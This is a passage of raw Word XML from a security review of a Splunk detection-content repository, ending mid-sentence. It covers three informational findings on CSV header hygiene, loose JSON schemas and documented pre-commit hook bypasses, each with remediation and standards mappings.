          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> job_name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>mandatory_step_for_job.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ransomware_notes_lookup.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> status</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>suspicious_writes_lookup.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> note</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>images_to_repository.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dynamic_dns_providers_local.csv</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A UTF-8 BOM prepended to the first header makes the first field name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>﻿&lt;name&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rather than </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;name&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; leading spaces make the field </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rather than </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Whether Splunk strips these at lookup-load time depends on the Splunk version/transforms configuration — I could not verify Splunk's exact BOM/whitespace handling in this offline review, so this is raised as hygiene with that caveat. The risk if not stripped: a detection referencing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>OUTPUT Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>OUTPUTNEW isDynDNS_default</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> would not match the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> isDynDNS_default</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> column, silently returning null. Downstream detections do reference these exact names (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>windows_applocker_block_events.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>OUTPUT Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>detect_hosts_connecting_to_dynamic_domain_providers.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>OUTPUTNEW isDynDNS_default</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> None. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Not exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (data hygiene; potential silent detection gap).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PoC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>python3 -I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> byte inspection of header rows showed BOM bytes and leading spaces; detection field references confirmed by grep.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Strip BOM and leading/trailing whitespace from CSV headers in CI (normalize on commit); add a lint check that lookup CSV header field names match the names detections reference. Explanation: canonical header names eliminate silent lookup-miss gaps regardless of Splunk's stripping behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mappings:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-20 / CWE-176 (Improper Handling of Unicode Encoding) analog. OWASP A05:2021. ASVS v4 5.1. NIST 800-53 Rev5 SI-10, SA-11. NIST CSF 2.0 PR.PS-06. ISO 27001:2022 A.8.28. Best practice: CSV header normalization in CI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-20 Improper Input Validation (2024 CWE Top 25 #12); CWE-176. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A05:2021 Security Misconfiguration. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation, SA-11 Developer Testing and Evaluation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Splunk app and dashboards / Input Validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>APP-13 — JSON schemas leave SPL/playbook/cron fields unconstrained; RemovedContent schema lacks additionalProperties:false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Informational (no CVSS score (informational)). Exploitability: Validation strength.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> schemas/EventBasedDetection.schema.json:5182-5185,5206-5210,5428-5433,6898-6901; schemas/Playbook.schema.json:2878-2882; schemas/RemovedContent.schema.json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Informational</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVSS v3.1 N/A</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>schemas/EventBasedDetection.schema.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SplString</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> def lines 5428-5433 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"pattern": "[^\\s].+[^\\s]"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> only); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lines 6898-6901 and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Drilldown.search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lines 5182-5185 (unconstrained string); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>EsTokenString</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lines 5206-5210 (plain string, "runtime-validated"); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>schemas/Playbook.schema.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lines 2878-2882 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>playbook</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> unconstrained); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>cron_schedule</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> unconstrained (field_validator); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>schemas/RemovedContent.schema.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (no top-level </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>additionalProperties: false</w:t>
      </w:r>
      <w:r>
        <w:t>, unlike the other 10 schemas).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The build-time JSON schemas do not constrain the most security-relevant free-text fields: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Drilldown.search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> accept any SPL, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>playbook</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> accepts any string, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>cron_schedule</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is unvalidated at the schema layer (these are enforced only by downstream Pydantic/field validators at contentctl build time, which is reasonable but means a schema-only consumer gets no guardrail). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>RemovedContent.schema.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> omits </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>additionalProperties: false</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, so it silently accepts unknown keys — a typo'd field in a removed-content entry would pass validation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>TestData.data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> allows a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>format: file-path</w:t>
      </w:r>
      <w:r>
        <w:t>, and large enums (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AllContentEnum</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AtomicGuidEnum</w:t>
      </w:r>
      <w:r>
        <w:t>) are present.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Schemas validate repo-authored content, not runtime user input. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Not exploitable</w:t>
      </w:r>
      <w:r>
        <w:t>; robustness/validation-strength note.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PoC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Read of the schema defs; compared </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>additionalProperties</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> presence across the 11 schema files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Add </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>additionalProperties: false</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>RemovedContent.schema.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for parity; document that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>playbook</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are intentionally runtime-validated and keep the Pydantic validators authoritative; consider a lightweight SPL/cron sanity pattern at the schema layer for fail-fast feedback. Explanation: strict schemas catch typos and unexpected fields before the heavier build runs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mappings:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-20 (Improper Input Validation), CWE-1286 (Improper Validation of Syntactic Correctness). OWASP A05:2021 / A08:2021. ASVS v4 5.1 / 13.x. NIST 800-53 Rev5 SI-10, SA-11. NIST CSF 2.0 PR.PS-06. ISO 27001:2022 A.8.28. Best practice: strict JSON Schema (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>additionalProperties:false</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-20 Improper Input Validation (2024 CWE Top 25 #12); CWE-1286 Improper Validation of Syntactic Correctness of Input. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A05:2021 Security Misconfiguration, A08:2021 Software and Data Integrity Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation, SA-11 Developer Testing and Evaluation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Splunk app and dashboards / Input Validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>APP-14 — Documentation instructs bypassing pre-commit hooks (git commit --no-verify); yamllint scoped to detections only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Informational (no CVSS score (informational)). Exploitability: SDLC control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> docs/ci/yaml_formatting.md; .yamllint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Informational</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVSS v3.1 N/A</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>docs/ci/yaml_formatting.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (documents using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>git commit --no-verify</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to skip the formatting pre-commit hook).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The contributor doc describes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>git commit --no-verify</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to skip pre-commit formatting checks. While sometimes necessary, documenting it as a routine step trains contributors to bypass the hook that also runs lint/secret checks, weakening the shift-left controls (and would let the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>example_log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> secrets of APP-11 slip past a local scan if the server-side gate is also lenient). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.yamllint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> additionally ignores all directories except </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>detections/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, so most of the repo (including </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>data_sources/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lookups/</w:t>
      </w:r>
      <w:r>
        <w:t>) is not linted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> N/A (process/governance). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Not exploitable</w:t>
      </w:r>
      <w:r>
        <w:t>; SDLC-control note.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PoC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Read of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>docs/ci/yaml_formatting.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.yamllint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ignore scope.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Enforce the same checks server-side in CI (required status checks) so </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--no-verify</w:t>
      </w:r>
      <w:r>
